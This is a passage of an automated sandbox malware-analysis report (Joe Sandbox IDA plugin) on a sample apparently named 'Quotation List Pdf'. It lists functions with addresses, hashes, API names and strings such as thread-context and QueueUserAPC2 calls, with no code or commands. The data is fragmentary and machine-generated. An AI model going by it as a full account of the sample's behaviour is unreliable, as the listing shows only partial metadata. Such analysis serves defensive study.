                                                      • Instruction Fuzzy Hash: A3412951F28B4AC1E905AF379641234D943EF6A3D0EACCB31D81D367E5EF2D70885214
                                                      Function 00007FF76845C0A0 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee72cb688372a8b7ca6c53026427fe1cb6e98e11cf675aa8f3c1fed9b58c5e49
                                                      • Instruction ID: b735b7cd65269d7ee6a76a3eaf0d74f8ac00a349f73fa92730d3c914556be139
                                                      • Opcode Fuzzy Hash: ee72cb688372a8b7ca6c53026427fe1cb6e98e11cf675aa8f3c1fed9b58c5e49
                                                      • Instruction Fuzzy Hash: AC413721F16B4981EA159F7AA00197DDA52AF89BC4F9CC732DE0E27790EF3CF0818615
                                                      Function 00007FF7684F3D20 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7533faf894bf0ca9caf5f1480e5f2de4d9b878ab499b8342825ab4e25c589ece
                                                      • Instruction ID: ac5d465f0deade67ef6c179514259899e2eef5ca56dba00e8d8ba94603c6c5ec
                                                      • Opcode Fuzzy Hash: 7533faf894bf0ca9caf5f1480e5f2de4d9b878ab499b8342825ab4e25c589ece
                                                      • Instruction Fuzzy Hash: E531A473F09545C2EA58AF16D4911BCE652AF85BC4FDC9039CE0D07395DE2CEC928729
                                                      Function 00007FF7684629B0 Relevance: .1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58f6a76dfd64ef7b78e5c6641dc319f4b652810589be1d7a6d8d44123e559c2a
                                                      • Instruction ID: 934b829c999d6931824a9a8009a7d65ad9d9e43a341360e39c44ef3e8ead1230
                                                      • Opcode Fuzzy Hash: 58f6a76dfd64ef7b78e5c6641dc319f4b652810589be1d7a6d8d44123e559c2a
                                                      • Instruction Fuzzy Hash: 1321FC62B2875292FBB4AF39A29567ED751EF8D780F886130DE0C03E46DD2CD5C18A08
                                                      Function 00007FF7684339D0 Relevance: .1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFailFastRaise$Sleep
                                                      • String ID:
                                                      • API String ID: 3706814929-0
                                                      • Opcode ID: b4f4eecb476bf04b12e31564723069907bbc9b466724c713cfc222d08a9c6718
                                                      • Instruction ID: 3d56176418b86fabc8e7620ec6f4099a630f296baa2dae0f581e6bd4818b7ed8
                                                      • Opcode Fuzzy Hash: b4f4eecb476bf04b12e31564723069907bbc9b466724c713cfc222d08a9c6718
                                                      • Instruction Fuzzy Hash: 3A21F232B28546C2FB20AF5AE450BAAEA11EFC4784F844035EF4E42A98ED3CD005C718
                                                      Function 00007FF768431C50 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d970be861cd335eefdf12fe82d3e44501331a57d5991168e1a8962bd367bcf6
                                                      • Instruction ID: 885bb08070c6090096f23c39b5d03c2256d9fd11bdc42f97750146cb84fef82a
                                                      • Opcode Fuzzy Hash: 1d970be861cd335eefdf12fe82d3e44501331a57d5991168e1a8962bd367bcf6
                                                      • Instruction Fuzzy Hash: B8F01C90E68547D2EA14BF27E8510F4D6212FA67C0FC82432D92E57693BE1CE554837C
                                                      Function 00007FF768433000 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 144librarythreadloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                                                      • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                                                      • API String ID: 2652322181-269241671
                                                      • Opcode ID: 2ed5142675b828450414f6af03e9e150d3f22da0891d8269898bcd82b2a367be
                                                      • Instruction ID: 3b121b61d90712d5a2923a40a02347d3b1fe276b6ade34395dfd6f4e0acf078d
                                                      • Opcode Fuzzy Hash: 2ed5142675b828450414f6af03e9e150d3f22da0891d8269898bcd82b2a367be
                                                      • Instruction Fuzzy Hash: 2B519130A08A42C2EB60EF12E8543B9E7A1EF84BD4F844235D95D47795EF3CD406CB68
                                                      Function 00007FF768433007 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 142librarythreadloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                                                      • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                                                      • API String ID: 2652322181-269241671
                                                      • Opcode ID: 4825748d57e2d133e0b0926e79e8171601229c5e1e52b9d54749e5c96503095b
                                                      • Instruction ID: 6d5d34e72a6515e350fcf8ee9b2a85128cb18f9d73c6d744b2286dfe0509b190
                                                      • Opcode Fuzzy Hash: 4825748d57e2d133e0b0926e79e8171601229c5e1e52b9d54749e5c96503095b
                                                      • Instruction Fuzzy Hash: 56519130A08A42C2EB60EF12E8543B9E7A1EF88BC4F844135D94D47795EF3CD406CB68
                                                      Function 00007FF76843DBD0 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 101stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC0E
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC36
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC56
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC76
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DC96
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DCBA
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DCDE
                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843DD02
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: strcmp
                                                      • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                                                      • API String ID: 1004003707-945519297
                                                      • Opcode ID: a2420435b7c8d9abb28f4f8f1ce3c06c939d7a2a25c3777b265420f1345e2620
                                                      • Instruction ID: 7f77bc0a8dc498c0b9e10c34083b2b1192301e04ab799cb3dcb54bd7cf568111
                                                      • Opcode Fuzzy Hash: a2420435b7c8d9abb28f4f8f1ce3c06c939d7a2a25c3777b265420f1345e2620
                                                      • Instruction Fuzzy Hash: 7F413E60E08652C1EA50BF16E541275DB62AF457F4FC44331DA3C57AE6EF6CE8468328
                                                      Function 00007FF76843CBA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                      • String ID: InitializeContext2$kernel32.dll
                                                      • API String ID: 4102459504-3117029998
                                                      • Opcode ID: 4faa34e522b81a6922513b62757b9b2305a4d9aa7d62287a7091f890ca87deb6
                                                      • Instruction ID: cc53472af4149e0c0dbc9e4f99b3111504264aaa2d88ca7a0772f6716cb7d328
                                                      • Opcode Fuzzy Hash: 4faa34e522b81a6922513b62757b9b2305a4d9aa7d62287a7091f890ca87deb6
                                                      • Instruction Fuzzy Hash: BE314B31A08B66C2FA10AF96F440279E791AF44BD1F880435DD4D467A5DF7CE846CB68
                                                      Function 00007FF7684333B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                      • String ID:
                                                      • API String ID: 510365852-3916222277
                                                      • Opcode ID: e3e0a65bc4f973e40a7d5c75bb7f7f943cf2642b959c91c2dbab2de6d3c60d57
                                                      • Instruction ID: 46376f35eae42228e7cb1b29499817a56a2a58d60b0737485f147cd1065bcef3
                                                      • Opcode Fuzzy Hash: e3e0a65bc4f973e40a7d5c75bb7f7f943cf2642b959c91c2dbab2de6d3c60d57
                                                      • Instruction Fuzzy Hash: F4113972A08B81CADB64EF26E44129AB751EB457B4F940335E6BD0BAD6CF38D5428704
                                                      Function 00007FF768467C50 Relevance: 7.6, APIs: 6, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: 1666322e2a904ac0cf5b3a234637cb36e490dfc74a66e8185ec8efb97d466e7c
                                                      • Instruction ID: b1396aed3a9d12489d0d104fc742f9d532843687595f0014226a5092b74b6f1e
                                                      • Opcode Fuzzy Hash: 1666322e2a904ac0cf5b3a234637cb36e490dfc74a66e8185ec8efb97d466e7c
                                                      • Instruction Fuzzy Hash: 28618E61A0DB86C5FA50AF15E8402B5FBA1FF48B84FD80931D94D5336ADF3CE48583A8
                                                      Function 00007FF768462F80 Relevance: 7.6, APIs: 6, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: b21c72c450b463f4920cee275832f193dea19a1ca35f9c4e2b50207979d5093b
                                                      • Instruction ID: 3c7945f53ddd4ce7cf8573ba529690c26e566f320739d943587cba1a3cc2557a
                                                      • Opcode Fuzzy Hash: b21c72c450b463f4920cee275832f193dea19a1ca35f9c4e2b50207979d5093b
                                                      • Instruction Fuzzy Hash: 14514D71A0DB86C1EA60AF10E8403B5F7A5FF89744F880536D98D5376ADF3CE0998768
                                                      Function 00007FF768433EB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFailFastRaise
                                                      • String ID: Process is terminating due to StackOverflowException.
                                                      • API String ID: 2546344036-2200901744
                                                      • Opcode ID: edcb76423634533c14701209537ab2eaed2715ea9f1ac3b1dd4543dc0ac9788a
                                                      • Instruction ID: 53208ed83f2538c3b9c8e465ebed8ddde3c8a48e5b377b72f9162ce8f25d4102
                                                      • Opcode Fuzzy Hash: edcb76423634533c14701209537ab2eaed2715ea9f1ac3b1dd4543dc0ac9788a
                                                      • Instruction Fuzzy Hash: 5F519631B08642C2EE60AF16E4403B8E7A1EF58BD4FC44131DA1E477A5DF2EE8958318
                                                      Function 00007FF768471970 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: SwitchThread
                                                      • String ID:
                                                      • API String ID: 115865932-0
                                                      • Opcode ID: 95544bbce4b90e12acf5c392e48b6c2ca22bac221c7c535adcad6349c9bd3327
                                                      • Instruction ID: a811e148a0f195096cd7dc69e19b122fd619beb8620119b3dd07902e1b6b43c3
                                                      • Opcode Fuzzy Hash: 95544bbce4b90e12acf5c392e48b6c2ca22bac221c7c535adcad6349c9bd3327
                                                      • Instruction Fuzzy Hash: A941A432B09746C5EBA09E25D150679FBA0EF41BD8F98813ACB4E467C9DE3CE441C768
                                                      Function 00007FF76843CD10 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768433541), ref: 00007FF76843CD44
                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768433541), ref: 00007FF76843CD4E
                                                      • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768433541), ref: 00007FF76843CD6D
                                                      • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF768433541), ref: 00007FF76843CD81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastMultipleWait$HandlesObjects
                                                      • String ID:
                                                      • API String ID: 2817213684-0
                                                      • Opcode ID: 71cbba1b383cf0b7fb516053fcd2ddd0c29d4ad2df29a1dc53a75a309a826a29
                                                      • Instruction ID: 60ee0ffe01b84494406654413b630b5b85064874034cb2b48d2b75d16b994555
                                                      • Opcode Fuzzy Hash: 71cbba1b383cf0b7fb516053fcd2ddd0c29d4ad2df29a1dc53a75a309a826a29
                                                      • Instruction Fuzzy Hash: C9117035A0CA65C3D7249B1AF45012AFAA1FF88BD0F940139FA8E47B95CF3CD4008B58
